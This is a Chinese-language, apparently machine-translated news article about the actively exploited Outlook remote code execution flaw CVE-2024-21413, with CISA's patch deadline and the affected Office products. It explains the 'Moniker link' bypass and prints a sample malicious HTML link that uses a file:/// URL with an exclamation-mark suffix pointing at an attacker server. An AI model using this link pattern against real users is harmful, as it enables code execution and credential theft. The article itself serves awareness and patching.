关键的Microsoft Outlook RCE错误在攻击中积极利用

网络安全公司检查点已经发现了Microsoft Outlook中的关键远程代码执行（RCE）漏洞，目前正在主动网络攻击中利用该漏洞，对全球组织构成了重大威胁。

这促使网络安全和基础设施安全局（CISA）警告美国联邦机构确保其系统免受此类持续攻击。

检查点脆弱性研究人员Haifei li发现了所追踪的高度rce脆弱性CVE-2024–21413（CVSS得分为9.8）。

该缺陷是由于输入验证不当引起的，该验证可以使用弱势Microsoft Outlook版本打开带有恶意链接的电子邮件时触发代码执行。

成功利用此漏洞将使威胁参与者在编辑模式而不是受保护模式下绕过办公室受保护的视图并打开恶意文件。

它还可以授予威胁行为者提高特权，包括读取，写入和删除数据的能力。

微软在一年前解决了CVE-2024–21413漏洞，警告预览窗格本身可能是攻击向量。

结果，仅在Outlook中查看恶意电子邮件可能就足以触发利用，从而使其异常危险。

根据检查点，攻击者利用称为Moniker链接的漏洞，该方法将Outlook欺骗到打开不安全的文件中。

这使威胁参与者可以使用文件：//协议绕过嵌入在电子邮件中的恶意链接的内置Outlook保护措施。

攻击者可以通过附加感叹号，然后在文件URL上附加诱惑标记，然后将Outlook操纵以将恶意文件视为受信任的资源。

通过在URL中的文件扩展后立即插入此感叹号标记，指向攻击者控制的服务器以及一些随机文本，它们可以欺骗系统并执行恶意有效载荷。

例如，攻击者可能会制作一个链接，如下所示：

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>点击我</a>

当受害者单击链接时，Outlook从攻击者的服务器中检索文件并以提高特权运行，从而授予攻击者对系统的控制。

CVE-2024-21413漏洞已经影响了多个Microsoft Office产品，包括Microsoft Office LTSC 2021，Microsoft 365 Apps for Enterprise，Microsoft Outlook 2016和Microsoft Office 2019。

为了响应这种漏洞的主动利用，CISA已将CVE-2024-21413添加到其已知的剥削漏洞（KEV）目录中。

根据2021年11月的约束力运营指令（BOD）22-01，联邦机构已经有时间到2025年2月27日，以修补其系统并保护其网络免受潜在威胁。

“这些类型的漏洞是恶意网络参与者的频繁攻击向量，并向联邦企业构成了重大风险。”警告星期四。

CVE-2024-21413在野外积极的剥削时，对Outlook用户呈现出严重的安全风险。

因此，建议私人组织立即应用补丁并加强网络安全防御措施，以防止潜在的违规行为。